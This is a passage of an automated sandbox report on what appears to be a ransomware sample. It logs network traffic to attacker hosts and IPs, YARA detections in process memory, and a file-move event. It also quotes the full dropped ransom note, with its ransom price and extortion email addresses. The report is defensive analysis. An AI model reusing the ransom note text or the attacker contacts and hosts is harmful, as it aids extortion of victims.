b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 Data Ascii: 37af`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*g'1e\;jKhc94dtb6rgwm\{HDB?n}:I(`{a&Vc(:V?#BSSQV+}?~ExU$$6N
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Jun 2023 18:24:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XW%2BzSpGWPNfoNB7jQEHChbZA0avyxgTqQ4UUP0rwMoXU%2FVT59Dgucjl4OjFtovrFd1GKKjwTqDM%2BL8Q8%2Bb79pf9oxoq1SpQxMH7IOjWH1tHL6FOKUHU5UsszhGFS6aWm"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7dae494dda2c6903-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Jun 2023 18:24:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UGRbwzCRqE1rStjMP5iZwaJAUkGYuChLpnY8Pgg%2FRHM7m3DXN1t0%2FroiVo64EM9HHECODFCyyv4SASGaZOHw8TWpMNEErbbklbf848zgwVYYY56s79w5K9mM0LYbmXBb"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7dae494f9c3c6903-FRAalt-svc: h3=":443"; ma=86400Data Raw: 32 63 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 1e 9a 1d d8 47 c7 fb 19 ed 2a fe 27 0a 5d 3b bf 64 11 6d 80 5c 67 0e 61 d4 0d 0a Data Ascii: 2cUys/~(`:G*'];dm\ga
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Jun 2023 18:24:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=G4R3qPTBZDCQ0F90Tu5Vb4HfAg%2FzGOzq1CTCj05eD6%2BiXT%2BHYG%2BdRi2H4dWEpodTPJ6bzf7vJkwP5vqEL3CE8AWBes31DvxfyRBQZ6Y3I228NlCfRrE%2FU677EVY4wGDR"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7dae4970fb8a30f3-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Jun 2023 18:24:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=x54GEIbvFmfdtHwfyvdtq20J2Z1L2QfqJkdNtYD%2FWY1zr%2BgcgcbxEzQwJ6BPhA9tKPL891BI%2BLSxHxVosY%2BGtWYnIMqMRqPqMONabvNjrNDS4UXPjiBr5PyBivBCT6y9"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7dae49721d5e30f3-FRAalt-svc: h3=":443"; ma=86400Data Raw: 32 36 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 49 c0 5f 88 1a 85 a2 4e fb 79 be 3d 44 55 3b be 63 1c 61 0d 0a Data Ascii: 26Uys/~(`:I_Ny=DU;ca
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Jun 2023 18:24:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3epyl%2FWnUkF0DWbmRXPIkVu0weRJb%2B9aFQnzrTKwD5jtiUZXDP%2FDnSyTN1EArzpzAKgvMq3%2FHuL4jc81P8K%2FhyGA2bjrT3AC6n%2BU7gcm8NJaxZbga2go3q73CqGIKSVF"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7dae498029b939e5-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Jun 2023 18:24:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4pNa9JcBekpP6Mr10XKTEGVibLoPRiWsn%2B8k3Eyrt6IeM6EaeMFrIKnwUQariyZEEBhQAuTLpvhFh7f5JSa0Rih2rUj79B09HZRPjSzSsF%2FaKQlrBUh46wLRpq0wg%2FGW"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7dae49814b3739e5-FRAalt-svc: h3=":443"; ma=86400Data Raw: 33 36 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 f7 75 3a 52 94 02 c5 5b c0 ff 01 b1 2c e2 23 41 5c 39 f3 7f 4a 67 83 55 66 1f 74 c1 e2 8d b2 d1 21 dc 28 3a 50 20 0d 0a Data Ascii: 36Uys/~(u:R[,#A\9JgUft!(:P
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
                Source: 9721.exe, 00000014.00000003.668822280.0000000009770000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.facebook.com/ equals www.facebook.com (Facebook)
                Source: 9721.exe, 00000014.00000003.668978838.0000000009770000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.twitter.com/ equals www.twitter.com (Twitter)
                Source: 9721.exe, 00000014.00000003.669045171.0000000009770000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.youtube.com/ equals www.youtube.com (Youtube)
                Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xsrefr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 169Host: potunulit.org
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.4:49698 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.4:49699 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.4:49701 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.4:49702 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.4:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.4:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.4:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 103.233.24.19:443 -> 192.168.2.4:49711 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.4:49714 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.4:49723 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.4:49729 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.4:49732 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 80.66.203.53:443 -> 192.168.2.4:49742 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: Yara matchFile source: 00000004.00000002.631913891.0000000001CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000002.692909496.0000000001CE1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.632649984.00000000039F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000002.692342997.0000000001CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.569951973.00000000038E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.569855669.0000000001E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: file.exe, 00000000.00000002.569495842.0000000001B58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                Spam, unwanted Advertisements and Ransom Demands

                barindex
                Source: C:\_readme.txtDropped file: ATTENTION!Don't worry, you can return all your files!All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.The only method of recovering files is to purchase decrypt tool and unique key for you.This software will decrypt all your encrypted files.What guarantees you have?You can send one of your encrypted file from your PC and we decrypt it for free.But we can decrypt only 1 file for free. File must not contain valuable information.You can get and look video overview decrypt tool:https://we.tl/t-vKvLYNOV9oPrice of private key and decrypt software is $980.Discount 50% available if you contact us first 72 hours, that's price for you is $490.Please note that you'll never restore your data without payment.Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.To get this software you need write on our e-mail:support@freshmail.topReserve e-mail address to contact us:datarestorehelp@airmail.ccYour personal ID:0731JOsiem5nCajqyEggMKwE5MKR2fPYUnjqSDp5pb5HFa467Jump to dropped file
                Source: Yara matchFile source: Process Memory Space: 9721.exe PID: 5864, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 46F.exe PID: 5000, type: MEMORYSTR
                Source: Yara matchFile source: 13.2.46F.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 31.2.3971.exe.39215a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.6E6C.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.3971.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.2.9721.exe.38f15a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 24.2.46F.exe.38a15a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 39.2.9721.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 39.2.9721.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.9721.exe.39815a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 25.2.46F.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 27.2.9721.exe.38f15a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 36.2.AB42.exe.38a15a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.9721.exe.39815a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.124D.exe.38c15a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 26.2.9721.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.124D.exe.38c15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.124D.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 35.2.9721.exe.39e15a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 24.2.46F.exe.38a15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.F42F.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.9721.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 36.2.AB42.exe.38a15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.124D.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.46F.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 25.2.46F.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.9721.exe.39215a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.3971.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.F42F.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 31.2.3971.exe.39215a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 20.2.9721.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.9721.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.9721.exe.39215a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.F42F.exe.38a15a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 26.2.9721.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.F42F.exe.38a15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 20.2.9721.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 22.2.6E6C.exe.39215a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.9721.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.6E6C.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.46F.exe.38b15a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 27.2.9721.exe.38f15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 22.2.6E6C.exe.39215a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 35.2.9721.exe.39e15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.9721.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.46F.exe.38b15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.2.9721.exe.38f15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000023.00000002.704356813.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.686813260.0000000003980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.660464369.0000000003920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.704302142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.640916155.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.648394809.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.686383358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000002.661107586.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.651980343.00000000038A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.651586722.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001B.00000002.671665065.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001F.00000002.703237929.0000000003920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000019.00000002.798083058.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000027.00000002.705832212.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001A.00000002.707784475.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000024.00000002.694197467.00000000038A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.637838144.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.631154898.0000000003920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.797952336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.656069794.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.659138526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000018.00000002.667734975.00000000038A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 9721.exe PID: 5512, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 9721.exe PID: 7060, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 124D.exe PID: 7152, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 124D.exe PID: 6684, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 46F.exe PID: 2888, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: F42F.exe PID: 4572, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 9721.exe PID: 3332, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 46F.exe PID: 3112, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: F42F.exe PID: 4768, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 9721.exe PID: 5192, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 9721.exe PID: 5864, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 6E6C.exe PID: 2148, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 6E6C.exe PID: 4608, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 46F.exe PID: 5308, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 46F.exe PID: 5000, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 9721.exe PID: 5024, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 9721.exe PID: 5384, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 9721.exe PID: 5792, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 9721.exe PID: 4560, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Temp\9721.exeFile moved: C:\Users\user\Desktop\GRXZDKKVDB\DUUDTUBZFW.jpg
